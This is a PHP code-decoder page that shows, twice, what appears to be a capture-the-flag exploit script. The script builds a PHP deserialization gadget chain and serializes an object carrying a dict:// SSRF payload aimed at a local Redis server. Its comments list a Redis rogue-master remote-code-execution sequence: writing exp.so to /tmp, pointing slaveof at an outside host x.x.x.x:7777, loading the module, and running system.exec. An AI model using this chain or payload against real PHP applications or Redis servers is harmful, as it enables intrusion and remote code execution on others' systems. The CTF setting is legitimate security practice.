Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php class Rd { public $ending; public $cl; public $poc; public ..

Decoded Output download

<?php  
class Rd 
{ 
    public $ending; 
    public $cl; 
    public $poc; 
 
    public function __destruct(){ 
        // echo "All matters have concluded"."</br>"; 
    } 
 
    public function __call($name, $arg){ 
        foreach ($arg as $key => $value) { 
            if ($arg[0]['POC'] == "0.o") { 
                $this->cl->var1 = "get"; 
            } 
        } 
    } 
} 
 
class Poc 
{ 
    public $payload; 
    public $fun; 
 
    public function __set($name, $value){ 
        $this->payload = $name; 
        $this->fun = $value; 
    } 
 
    function getflag($paylaod){ 
        echo "Have you genuinely accomplished what you set out to do?"."</br>"; 
        file_get_contents($paylaod); 
    } 
} 
 
class Er 
{ 
    public $symbol; 
    public $Flag; 
 
    public function __construct(){ 
        $this->symbol = True; 
    } 
 
    public function __set($name, $value){    
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){ 
               $value($this->Flag); 
        } 
    else { 
    echo "NoNoNo,please you can look hint.php"."</br>"; 
    } 
  } 
} 
 
class Ha 
{ 
    public $start; 
    public $start1; 
    public $start2; 
 
    public function __construct(){ 
        // echo $this->start1 . "__construct" . "</br>"; 
    } 
 
    public function __destruct(){ 
        if ($this->start2 === "o.0") { 
            $this->start1->Love($this->start); 
            // echo "You are Good!"."</br>"; 
        } 
    } 
} 
 
function get($url) { 
    // $url=base64_decode($url); 
    // var_dump($url); 
    // $ch = curl_init(); 
    // curl_setopt($ch, CURLOPT_URL, $url); 
    // curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    // curl_setopt($ch, CURLOPT_HEADER, 0); 
    // $output = curl_exec($ch); 
    // $result_info = curl_getinfo($ch); 
    // var_dump($result_info); 
    // curl_close($ch); 
    // var_dump($output); 
} 
 
// Ha::__destruct() -> Rd::__call() -> Er::__set() -> get() 
 
// payload evil redis-server 
// $payload = "dict://127.0.0.1:6379/config:set:dir:/tmp"; 
// $payload = "dict://127.0.0.1:6379/config:set:dbfilename:exp.so"; 
// $payload = "dict://127.0.0.1:6379/slaveof:x.x.x.x:7777"; 
// $payload = "dict://127.0.0.1:6379/module:load:/tmp/exp.so"; 
// $payload = "dict://127.0.0.1:6379/slave:no:one"; 
$payload = "dict://127.0.0.1:6379/system.exec:env"; 
$Er = new Er(); 
$Er -> Flag = base64_encode($payload); 
$Rd = new Rd(); 
$Rd -> cl = $Er; 
$Ha = new Ha(); 
$Ha -> start = ['POC'=>'0.o']; 
$Ha -> start1 = $Rd; 
$Ha -> start2 = 'o.0'; 
 
echo(serialize($Ha)); 
 ?> 

Did this file decode correctly?

Original Code

<?php 
class Rd
{
    public $ending;
    public $cl;
    public $poc;

    public function __destruct(){
        // echo "All matters have concluded"."</br>";
    }

    public function __call($name, $arg){
        foreach ($arg as $key => $value) {
            if ($arg[0]['POC'] == "0.o") {
                $this->cl->var1 = "get";
            }
        }
    }
}

class Poc
{
    public $payload;
    public $fun;

    public function __set($name, $value){
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod){
        echo "Have you genuinely accomplished what you set out to do?"."</br>";
        file_get_contents($paylaod);
    }
}

class Er
{
    public $symbol;
    public $Flag;

    public function __construct(){
        $this->symbol = True;
    }

    public function __set($name, $value){   
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
               $value($this->Flag);
        }
    else {
    echo "NoNoNo,please you can look hint.php"."</br>";
    }
  }
}

class Ha
{
    public $start;
    public $start1;
    public $start2;

    public function __construct(){
        // echo $this->start1 . "__construct" . "</br>";
    }

    public function __destruct(){
        if ($this->start2 === "o.0") {
            $this->start1->Love($this->start);
            // echo "You are Good!"."</br>";
        }
    }
}

function get($url) {
    // $url=base64_decode($url);
    // var_dump($url);
    // $ch = curl_init();
    // curl_setopt($ch, CURLOPT_URL, $url);
    // curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // curl_setopt($ch, CURLOPT_HEADER, 0);
    // $output = curl_exec($ch);
    // $result_info = curl_getinfo($ch);
    // var_dump($result_info);
    // curl_close($ch);
    // var_dump($output);
}

// Ha::__destruct() -> Rd::__call() -> Er::__set() -> get()

// payload evil redis-server
// $payload = "dict://127.0.0.1:6379/config:set:dir:/tmp";
// $payload = "dict://127.0.0.1:6379/config:set:dbfilename:exp.so";
// $payload = "dict://127.0.0.1:6379/slaveof:x.x.x.x:7777";
// $payload = "dict://127.0.0.1:6379/module:load:/tmp/exp.so";
// $payload = "dict://127.0.0.1:6379/slave:no:one";
$payload = "dict://127.0.0.1:6379/system.exec:env";
$Er = new Er();
$Er -> Flag = base64_encode($payload);
$Rd = new Rd();
$Rd -> cl = $Er;
$Ha = new Ha();
$Ha -> start = ['POC'=>'0.o'];
$Ha -> start1 = $Rd;
$Ha -> start2 = 'o.0';

echo(serialize($Ha));
 ?>

Function Calls

None

Variables

None

Stats

MD5 7ca722377884dd1a884d095001f2765b
Eval Count 0
Decode Time 68 ms